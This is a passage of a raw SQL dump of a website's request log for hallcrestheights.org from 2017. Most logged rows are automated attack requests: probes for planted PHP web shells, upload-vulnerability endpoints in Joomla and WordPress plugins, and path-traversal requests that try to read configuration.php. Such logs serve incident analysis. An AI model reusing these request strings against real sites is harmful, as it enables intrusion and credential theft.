00:00:00'),(7989,'http://hallcrestheights.org//images/head.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:30','0000-00-00 00:00:00'),(7990,'http://hallcrestheights.org//cache/support.php?z3=M09tSXFPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:33','0000-00-00 00:00:00'),(7991,'http://hallcrestheights.org//RoseLeif.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:35','0000-00-00 00:00:00'),(7992,'http://hallcrestheights.org//Abbrevsprl.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:38','0000-00-00 00:00:00'),(7993,'http://hallcrestheights.org//show.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:40','0000-00-00 00:00:00'),(7994,'http://hallcrestheights.org//images/defau1t.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:43','0000-00-00 00:00:00'),(7995,'http://hallcrestheights.org//cli/40dd1d.php?z3=M09tSXFPLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:45','0000-00-00 00:00:00'),(7996,'http://hallcrestheights.org//infos.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:50','0000-00-00 00:00:00'),(7997,'http://hallcrestheights.org//cache/defau1t.php?z3=M09tSXFPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:52','0000-00-00 00:00:00'),(7998,'http://hallcrestheights.org//bookmark.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:55','0000-00-00 00:00:00'),(7999,'http://hallcrestheights.org//configbak.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:58','0000-00-00 00:00:00'),(8000,'http://hallcrestheights.org//wp-data.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:01','0000-00-00 00:00:00'),(8001,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:03','0000-00-00 00:00:00'),(8002,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:06','0000-00-00 00:00:00'),(8003,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:08','0000-00-00 00:00:00'),(8004,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:11','0000-00-00 00:00:00'),(8005,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:13','0000-00-00 00:00:00'),(8006,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:15','0000-00-00 00:00:00'),(8007,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:17','0000-00-00 00:00:00'),(8008,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:20','0000-00-00 00:00:00'),(8009,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:22','0000-00-00 00:00:00'),(8010,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=M09tSXFPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:26','0000-00-00 00:00:00'),(8011,'http://hallcrestheights.org//cache/list.php?z3=M09tSXFPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:58:29','0000-00-00 00:00:00'),(8012,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/3OmIqO.php',NULL,'','',1,0,'2017-03-16 06:59:25','0000-00-00 00:00:00'),(8013,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/3OmIqO.php',NULL,'','',1,0,'2017-03-16 06:59:26','0000-00-00 00:00:00'),(8014,'http://hallcrestheights.org//wp-content/uploads/3OmIqO.php',NULL,'','',1,0,'2017-03-16 06:59:30','0000-00-00 00:00:00'),(8015,'http://hallcrestheights.org//3OmIqO.php',NULL,'','',1,0,'2017-03-16 06:59:32','0000-00-00 00:00:00'),(8016,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/3OmIqO.php',NULL,'','',1,0,'2017-03-16 06:59:38','0000-00-00 00:00:00'),(8017,'http://www.hallcrestheights.org/jgletky-mdrqznrv-k428-mlkswazv-kecqqne-eiaqjz-i20162633-lnplq.htm',NULL,'','',3,0,'2017-03-17 13:05:11','0000-00-00 00:00:00'),(8018,'http://www.hallcrestheights.org/k18205-bsoa-pazapst-asgmhcq-cmckf-i20162629-rdtfk/',NULL,'https://www.google.co.jp/','',3,0,'2017-03-18 10:51:26','0000-00-00 00:00:00'),(8019,'http://www.hallcrestheights.org/i20162628-k8540-jgletkym-drqzn-rvmlkswa-zvkecqq.htm',NULL,'android-app://com.google.android.googlequicksearchbox','',5,0,'2017-03-20 07:21:08','0000-00-00 00:00:00'),(8020,'http://www.hallcrestheights.org/cwhriw-k4999-gpekzqdw-kvum/zbsai-i20162629-imjz-fozgdvd-dqjvdob/',NULL,'http://search.yahoo.co.jp/','',4,0,'2017-03-21 04:49:21','0000-00-00 00:00:00'),(8021,'http://hallcrestheights.org/HH0208.pdf',NULL,'','',6,0,'2017-03-22 02:32:43','0000-00-00 00:00:00'),(8022,'http://www.hallcrestheights.org/HH_0109.pdf',NULL,'','',11,0,'2017-03-22 16:37:13','0000-00-00 00:00:00'),(8023,'http://www.hallcrestheights.org/k19440-gnfznxvj-xpalt-itjshkyj-yldpija-i20162628-amdu-rtaen-pggwtd-vlxt.htm',NULL,'https://search.yahoo.co.jp/','',2,0,'2017-03-25 07:04:23','0000-00-00 00:00:00'),(8024,'http://www.hallcrestheights.org/bsoap-k35677-azapst-asgmh-cqcm-ckfrdtf-kgpvbchs-iwhorklv-i20162635-zrtjrsy-oaayfwgd/',NULL,'','',3,0,'2017-03-26 23:42:13','0000-00-00 00:00:00'),(8025,'http://hallcrestheights.org/components/com_content/views/form/backup.php',NULL,'http://hallcrestheights.org/components/com_content/views/form/backup.php','',2,0,'2017-03-27 02:38:22','0000-00-00 00:00:00'),(8026,'http://hallcrestheights.org/libraries/fof/utils/timer/backup.php',NULL,'http://hallcrestheights.org/libraries/fof/utils/timer/backup.php','',2,0,'2017-03-27 02:38:23','0000-00-00 00:00:00'),(8027,'http://hallcrestheights.org/components/com_users/helpers/html/backup.php',NULL,'http://hallcrestheights.org/components/com_users/helpers/html/backup.php','',2,0,'2017-03-27 02:38:23','0000-00-00 00:00:00'),(8028,'http://hallcrestheights.org/libraries/joomla/application/web/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/application/web/backup.php','',2,0,'2017-03-27 02:38:23','0000-00-00 00:00:00'),(8029,'http://hallcrestheights.org/components/com_jce/editor/extensions/backup.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/extensions/backup.php','',2,0,'2017-03-27 02:38:23','0000-00-00 00:00:00'),(8030,'http://hallcrestheights.org/components/com_acymailing/controllers/config.php',NULL,'http://hallcrestheights.org/components/com_acymailing/controllers/config.php','',2,0,'2017-03-27 02:38:23','0000-00-00 00:00:00'),(8031,'http://hallcrestheights.org/libraries/joomla/filesystem/streams/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/filesystem/streams/backup.php','',4,0,'2017-03-27 02:38:44','0000-00-00 00:00:00'),(8032,'http://hallcrestheights.org/libraries/vendor/joomla/string/backup.php',NULL,'http://hallcrestheights.org/libraries/vendor/joomla/string/backup.php','',2,0,'2017-03-27 02:38:44','0000-00-00 00:00:00'),(8033,'http://hallcrestheights.org/libraries/joomla/crypt/password/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/crypt/password/backup.php','',2,0,'2017-03-27 02:38:44','0000-00-00 00:00:00'),(8034,'http://hallcrestheights.org/media/plg_fancybox/readme.php',NULL,'http://hallcrestheights.org/media/plg_fancybox/readme.php','',3,0,'2017-03-27 02:38:45','0000-00-00 00:00:00'),(8035,'http://hallcrestheights.org/modules/mod_weblinks/tmpl/backup.php',NULL,'http://hallcrestheights.org/modules/mod_weblinks/tmpl/backup.php','',2,0,'2017-03-27 02:38:45','0000-00-00 00:00:00'),(8036,'http://hallcrestheights.org/modules/mod_users_latest/tmpl/stopgloal.php',NULL,'http://hallcrestheights.org/modules/mod_users_latest/tmpl/stopgloal.php','',2,0,'2017-03-27 02:38:45','0000-00-00 00:00:00'),(8037,'http://www.hallcrestheights.org/upttmnbe-atgrb-k4970-nqcdcncx-rdhcpgz/i20162632-zdll-imvyx-jltfeo-bkeb-wivsmqkr-fbmlkmst-howgwh-lkjlbm.htm',NULL,'','',3,0,'2017-03-27 08:32:09','0000-00-00 00:00:00'),(8038,'http://hallcrestheights.org//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',11,0,'2017-03-27 17:24:15','0000-00-00 00:00:00'),(8039,'http://hallcrestheights.org/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',11,0,'2017-03-27 17:24:50','0000-00-00 00:00:00'),(8040,'http://hallcrestheights.org/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',26,0,'2017-03-27 17:24:50','0000-00-00 00:00:00'),(8041,'http://www.hallcrestheights.org/oiyi-i20162637-k7145-zgolrcm-wfbsnop-dgfnh/',NULL,'','',3,0,'2017-03-27 21:12:38','0000-00-00 00:00:00'),(8042,'http://www.hallcrestheights.org/wbwpb-k14777-onkydh-xjjik-i20162635-vfvt/',NULL,'','',3,0,'2017-03-28 10:45:02','0000-00-00 00:00:00'),(8043,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-terqb-i20162629-k15649-wnsw/',NULL,'https://www.google.co.jp/','',4,0,'2017-03-28 12:23:37','0000-00-00 00:00:00'),(8044,'http://hallcrestheights.org//media/cloud.php',NULL,'','',4,0,'2017-03-28 18:05:39','0000-00-00 00:00:00'),(8045,'http://hallcrestheights.org//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form',NULL,'','',1,0,'2017-03-28 18:05:58','0000-00-00 00:00:00'),(8046,'http://hallcrestheights.org/cloud.php',NULL,'','',1,0,'2017-03-28 18:06:18','0000-00-00 00:00:00'),(8047,'http://hallcrestheights.org//index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',1,0,'2017-03-28 18:07:00','0000-00-00 00:00:00'),(8048,'http://hallcrestheights.org//index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',1,0,'2017-03-28 18:07:11','0000-00-00 00:00:00'),(8049,'http://www.hallcrestheights.org/i20162628-ixnmueah-k18640-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-ytni-holbdent.htm',NULL,'','',2,0,'2017-03-29 08:03:35','0000-00-00 00:00:00'),(8050,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj-i20162629-k4849-njbo/',NULL,'','',6,0,'2017-03-30 11:17:57','0000-00-00 00:00:00'),(8051,'http://hallcrestheights.org/tmp/krd.php',NULL,'','',4,0,'2017-04-01 08:42:01','0000-00-00 00:00:00'),(8052,'http://www.hallcrestheights.org/i20162635-oiyiz-golrcm-k2257-wfbsn-opdg-fnhskrl/',NULL,'http://search.yahoo.co.jp/r/FOR=w0YzT7dV3igfxjq2PbdR3jAJhFJsoM0tNItqejkroZgqYZv2xrIBxcn.3ZH62wS3WYEWJ8_6wP3E6kyXa9tseQcHb4mo1_ZQeVBywSKF7HRTXdQi2AwOY6','',2,0,'2017-04-01 15:06:28','0000-00-00 00:00:00'),(8053,'http://hallcrestheights.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form',NULL,'','',18,0,'2017-04-02 15:43:07','0000-00-00 00:00:00'),(8054,'http://www.hallcrestheights.org/k60740-upttmnbe-i20162637-atgrb-nqcdcncx-rdhcpgz.htm',NULL,'','',2,0,'2017-04-03 10:02:45','0000-00-00 00:00:00'),(8055,'http://www.hallcrestheights.org/k31112-ryvh-rhmqtyy-i20162634-sllge-ajanpd.htm',NULL,'https://www.google.co.jp/','',5,0,'2017-04-03 10:28:15','0000-00-00 00:00:00'),(8056,'http://www.hallcrestheights.org//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2017-04-03 18:28:26','0000-00-00 00:00:00'),(8057,'http://www.hallcrestheights.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',1,0,'2017-04-03 18:28:30','0000-00-00 00:00:00'),(8058,'http://www.hallcrestheights.org/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2017-04-03 18:28:38','0000-00-00 00:00:00'),(8059,'http://www.hallcrestheights.org/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',2,0,'2017-04-03 18:28:39','0000-00-00 00:00:00'),(8060,'http://www.hallcrestheights.org/news/gokakusya2015.html',NULL,'','',5,0,'2017-04-04 08:01:59','0000-00-00 00:00:00'),(8061,'http://www.hallcrestheights.org/i20162632-edzvdlq-comnnmmc-k62428-awvbfuja-pyvrlfl-xhqjku-hkcmu-mbhmgznk.htm',NULL,'https://www.google.co.jp/','',3,0,'2017-04-04 08:33:30','0000-00-00 00:00:00'),(8062,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/NULLpOint7r__tkjip.php',NULL,'','',1,0,'2017-04-05 18:45:06','0000-00-00 00:00:00'),(8063,'http://hallcrestheights.org/wp-content/plugins/showbiz/temp/update_extract/NULLpOint7r__eikqt.php',NULL,'','',1,0,'2017-04-05 18:45:14','0000-00-00 00:00:00'),(8064,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-hjxbnwpg-i20162632-eyooayik-uksszq-cebaq-domytn-k43184-iholb-dentafy-mluzext-lfgg.htm',NULL,'http://search.yahoo.co.jp/','',5,0,'2017-04-05 23:23:03','0000-00-00 00:00:00'),(8065,'http://hallcrestheights.org/4Rc43a.php',NULL,'','',1,0,'2017-04-06 15:11:30','0000-00-00 00:00:00'),(8066,'http://hallcrestheights.org//images/1ndex.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:34:28','0000-00-00 00:00:00'),(8067,'http://hallcrestheights.org//sqlbak.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:34:30','0000-00-00 00:00:00'),(8068,'http://hallcrestheights.org//email.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:34:37','0000-00-00 00:00:00'),(8069,'http://hallcrestheights.org//functions.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:37:36','0000-00-00 00:00:00'),(8070,'http://hallcrestheights.org//cache/news.php?z3=YUI1cmpLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:37:41','0000-00-00 00:00:00'),(8071,'http://hallcrestheights.org//tmp.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-04-07 00:37:45','0000-00-00 00:00:00'),(8072,'http://hallcrestheights.org//shootme.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:39:02','0000-00-00 00:00:00'),(8073,'http://hallcrestheights.org//configurationbak.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:40:38','0000-00-00 00:00:00'),(8074,'http://hallcrestheights.org//robots.txt.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:40:45','0000-00-00 00:00:00'),(8075,'http://hallcrestheights.org//jconfig.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:40:52','0000-00-00 00:00:00'),(8076,'http://hallcrestheights.org//media/reads.php?z3=YUI1cmpLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:40:58','0000-00-00 00:00:00'),(8077,'http://hallcrestheights.org//media/1ndex.php?z3=YUI1cmpLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:41:02','0000-00-00 00:00:00'),(8078,'http://hallcrestheights.org//sql_dump.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:42:22','0000-00-00 00:00:00'),(8079,'http://hallcrestheights.org//images/laj.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:43:52','0000-00-00 00:00:00'),(8080,'http://hallcrestheights.org//media/404.php?z3=YUI1cmpLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:44:10','0000-00-00 00:00:00'),(8081,'http://hallcrestheights.org//media/tmp.php?z3=YUI1cmpLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:44:15','0000-00-00 00:00:00'),(8082,'http://hallcrestheights.org//r3x.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:45:20','0000-00-00 00:00:00'),(8083,'http://hallcrestheights.org//log.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:45:28','0000-00-00 00:00:00'),(8084,'http://hallcrestheights.org//images/stories/0day.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:45:32','0000-00-00 00:00:00'),(8085,'http://hallcrestheights.org//includes/u2p.php?z3=YUI1cmpLLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:45:37','0000-00-00 00:00:00'),(8086,'http://hallcrestheights.org//images/xxx.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:45:43','0000-00-00 00:00:00'),(8087,'http://hallcrestheights.org//al277.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:45:47','0000-00-00 00:00:00'),(8088,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=YUI1cmpLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:46:52','0000-00-00 00:00:00'),(8089,'http://hallcrestheights.org//install.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:48:28','0000-00-00 00:00:00'),(8090,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=YUI1cmpLLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:48:32','0000-00-00 00:00:00'),(8091,'http://hallcrestheights.org//robot.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:49:17','0000-00-00 00:00:00'),(8092,'http://hallcrestheights.org//wsdl.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:49:20','0000-00-00 00:00:00'),(8093,'http://hallcrestheights.org//goog1es.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:49:27','0000-00-00 00:00:00'),(8094,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=YUI1cmpLLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:49:32','0000-00-00 00:00:00'),(8095,'http://hallcrestheights.org//update.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:50:54','0000-00-00 00:00:00'),(8096,'http://hallcrestheights.org//includes.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:50:56','0000-00-00 00:00:00'),(8097,'http://hallcrestheights.org//wp-main.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:52:33','0000-00-00 00:00:00'),(8098,'http://hallcrestheights.org//news.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:52:41','0000-00-00 00:00:00'),(8099,'http://hallcrestheights.org//images/al277.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:52:45','0000-00-00 00:00:00'),(8100,'http://hallcrestheights.org//webconfig.txt.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:52:50','0000-00-00 00:00:00'),(8101,'http://hallcrestheights.org//cache/cachee.php?z3=YUI1cmpLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 00:56:03','0000-00-00 00:00:00'),(8102,'http://hallcrestheights.org//thumb.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 00:57:45','0000-00-00 00:00:00'),(8103,'http://hallcrestheights.org//SessionController.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:01:13','0000-00-00 00:00:00'),(8104,'http://hallcrestheights.org//maill.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:01:30','0000-00-00 00:00:00'),(8105,'http://hallcrestheights.org//error-log.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:04:44','0000-00-00 00:00:00'),(8106,'http://hallcrestheights.org//authenticating.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:04:51','0000-00-00 00:00:00'),(8107,'http://hallcrestheights.org//google-assist.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:05:01','0000-00-00 00:00:00'),(8108,'http://hallcrestheights.org//images/google-assist.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:05:08','0000-00-00 00:00:00'),(8109,'http://hallcrestheights.org//images/robots.txt.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:05:16','0000-00-00 00:00:00'),(8110,'http://hallcrestheights.org//elements.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:06:57','0000-00-00 00:00:00'),(8111,'http://hallcrestheights.org//xmlsrpc.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:07:00','0000-00-00 00:00:00'),(8112,'http://hallcrestheights.org//wp-cache.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:07:06','0000-00-00 00:00:00'),(8113,'http://hallcrestheights.org//images/404.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:07:14','0000-00-00 00:00:00'),(8114,'http://hallcrestheights.org//images/head.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:08:54','0000-00-00 00:00:00'),(8115,'http://hallcrestheights.org//cache/support.php?z3=YUI1cmpLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:09:03','0000-00-00 00:00:00'),(8116,'http://hallcrestheights.org//RoseLeif.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:10:43','0000-00-00 00:00:00'),(8117,'http://hallcrestheights.org//Abbrevsprl.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:12:29','0000-00-00 00:00:00'),(8118,'http://hallcrestheights.org//show.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:14:05','0000-00-00 00:00:00'),(8119,'http://hallcrestheights.org//images/defau1t.php?z3=YUI1cmpLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:14:16','0000-00-00 00:00:00'),(8120,'http://hallcrestheights.org//cli/40dd1d.php?z3=YUI1cmpLLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:16:00','0000-00-00 00:00:00'),(8121,'http://hallcrestheights.org//infos.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:16:12','0000-00-00 00:00:00'),(8122,'http://hallcrestheights.org//cache/defau1t.php?z3=YUI1cmpLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:17:50','0000-00-00 00:00:00'),(8123,'http://hallcrestheights.org//bookmark.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:18:24','0000-00-00 00:00:00'),(8124,'http://hallcrestheights.org//configbak.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:18:33','0000-00-00 00:00:00'),(8125,'http://hallcrestheights.org//wp-data.php?z3=YUI1cmpLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:20:08','0000-00-00 00:00:00'),(8126,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:20:24','0000-00-00 00:00:00'),(8127,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:20:39','0000-00-00 00:00:00'),(8128,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:22:15','0000-00-00 00:00:00'),(8129,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:24:02','0000-00-00 00:00:00'),(8130,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:24:05','0000-00-00 00:00:00'),(8131,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-07 01:24:12','0000-00-00 00:00:00'),(8132,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=YUI1cmpLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-04-07 01:25:54','0000-00-00 